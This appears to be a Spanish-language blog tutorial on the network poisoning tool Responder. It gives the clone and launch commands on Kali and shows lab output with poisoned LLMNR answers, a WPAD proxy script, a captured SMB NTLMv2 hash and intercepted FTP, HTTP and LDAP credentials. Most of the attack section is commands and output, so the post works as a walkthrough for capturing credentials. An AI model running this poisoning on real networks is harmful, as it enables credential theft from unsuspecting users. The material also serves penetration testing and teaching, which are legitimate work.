Todo está escrito en Python pensando en la portabilidad, por lo que no será necesario instalar ninguna herramienta extra ni añadir ningún módulo adicional.
Lo ejecutas y escucha peticiones NBT-NS (NetBIOS Name Service), LLMNR (Link-local Multicast Name Resolution) y mDNS (multicast Domain Name System) y envenena al emisor. Cuando detecta una petición basada en el nombre del sufijo (ver: http://support.microsoft.com/kb/163409) solicitará y almacenará las credenciales de la víctima.
Responder además viene con varios servidores de autenticación falsos (HTTP/SMB/MSSQL/FTP/LDAP) que soportan NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP y autenticación HTTP básica.
Veámos un poco su facilidad de uso en una máquina virtual con Kali:
Instalación:
root@kali:~# git clone https://github.com/SpiderLabs/Responder.git
root@kali:~# cd Responder/
root@kali:~/Responder# ls
Certs FixInternet.exe LDAPPackets.py Responder.py
CHANGELOG HTTPCookies odict.py SMBPackets.py
Denied.html HTTPPackets.py RAPLANMANPackets.py SMBRelay.py
DHCP.py HTTPProxy.py README.md SMTPPackets.py
Fingerprint.py Icmp-Redirect.py RelayPackets.py SQLPackets.py
FingerprintRelay.py IMAPPackets.py Responder.confEjemplo de uso:
root@kali:~/Responder# python Responder.py -i 192.168.142.128 -I eth0 -d SMB -b 0 -r 1 -v
NBT Name Service/LLMNR Responder 2.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C
[+]NBT-NS, LLMNR & MDNS responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface: eth0
Challenge set: 1122334455667788
WPAD Proxy Server: False
WPAD script loaded: function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server: ON
HTTPS Server: ON
SMB Server: ON
SMB LM support: False
Kerberos Server: ON
SQL Server: ON
FTP Server: ON
IMAP Server: ON
POP3 Server: ON
SMTP Server: ON
DNS Server: ON
LDAP Server: ON
FingerPrint hosts: False
Serving Executable via HTTP&WPAD: OFF
Always Serving a Specific File via HTTP&WPAD: OFFCaptura de hash SMB-NTLMv2:
LLMNR poisoned answer sent to this IP: 192.168.142.1. The requested name was : servidor1.
[+]WPAD (no auth) file sent to: 192.168.142.1
LLMNR poisoned answer sent to this IP: 192.168.142.1. The requested name was : servidor1.
[+]SMB-NTLMv2 hash captured from : 192.168.142.1
[+]SMB complete hash is : prueba::DOMINIO:1122334455667788:1D863E3C5746398740BBD893B1F7B43B:01010000000000684CF017068466D9E239FD90000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E0061006C000500160C006F00630061006C000073006D006200310032002E00680030003000000000000000010000000020009E00000C5EC24000A0F2F627F8D95AAB1740E16A2D24BE1C9B0E222697E60D026DBF5C5C006C006F00634C3451030A001000000000000000000000000000000000000900120063006900660073002F006500760061006E000000000000000000Captura de credenciales FTP:
[[+]FTP User: test
[+]FTP Password is: testCaptura de credenciales HTTP/HTTPS:
[+]HTTP-User & Password: test:test
[+]HTTP GET request from : 192.168.142.1. The HTTP URL requested was: /favicon.ico
[+]HTTP-User & Password: test:test
[+]HTTP GET request from : 192.168.142.1. The HTTP URL requested was: /favicon.ico
[+]HTTP-User & Password: test:test
[+]HTTPS-User & Password: test:testCaptura LDAP:
[LDAP]Clear Text User & Password is: :Repositorio en Github: https://github.com/Spiderlabs/Responder
No hay comentarios:
Publicar un comentario